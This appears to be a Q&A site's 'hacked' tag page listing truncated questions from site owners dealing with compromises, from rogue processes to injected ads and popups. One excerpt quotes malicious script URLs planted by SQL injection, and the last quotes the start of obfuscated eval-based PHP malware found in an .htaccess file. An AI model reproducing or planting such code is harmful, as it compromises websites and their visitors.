hacked

Looking for Real Stories of Web Service Security Breaches

I'm a full time software developer, but on the side I'm teaching a university course on web services. I'm going over security right now and was wondering if any of you all have had any security breaches that you could tell about (details obscured as needed) that I could share with my students. Real life stories are a lot more meaningfu...

Find file launching a process

I think my server has been compromised and it has many perl processes running. However, I don't know what file they are being launched from so I can delete it. How can I find this information? ...

ASP.NET security issues, maybe Umbraco related, but most likely just general security issue...

Hi folks, I have an incredibly frustrating problem cleaning up my site at the moment. On the same hosting space I have Umbraco (ASP.NET) and Blab Lite (PHP Chatroom) installed. The former talks to SQL 2005, and the latter to MySQL 5. On my Umbraco site I had a guestbook with an entry form. Upon postback it does an Akismet check and ski...

Who owns a Google AdSense account?

Is there a way to tell who own a Google AdSense account by the java-script on the page? the google_ad_client or google_ad_slot? One of our sites was hacked and Google AdSense was placed on the pages. We would like to get as much information about the account and have Google shut it down, perhaps pursue legal options against the hacker....

Email has been compromised!

I have a cart script on my website that will collect information, and then send an email to the admin and the user. The email will auto send from [email protected] info@website does not actually exist, but on the server i have set the options to fwd any mails addressed to [email protected] to my main email. as of recently i am receivi...

Has anyone found out how this was done? SQL Injection

Since so many other websites have been hit I have to assume it is a bot! It has injected a script with: Yesterday: http://google-stats50.info/ur.php Today: http://google-stats49.info/ur.php It injected it into multiple tables. First, how did it identify the tables and columns? Second, what should I search for in the logs to identify...

a strange popup window opens in website

Hi there, i have a games website. in that there are more than 4000 flash games available. Now my problem is in my website i am getting a strange popup window whenever i first open up my web site in a day that pop up appears with sometimes google, sometimes yahoo sometimes and somee other sites..i dont know how the popups are coming.. ...

What does function s37 in htaccess do?

Found a code this morning encoded under several layers attached to a website I administer's .htaccess. The code reads as follows: function s37($s){for ($a = 0; $a <= strlen($s)-1; $a++ ){$e .= $s{strlen($s)-$a-1};}return($e);}eval(s37(';"ni"=73c$;"ptth"=73h$;"stats"=73z$'));eval(s37(';]"TNEGA_RESU_PTTH"[REVRES_$=3au$'));eval(s37(';)"re...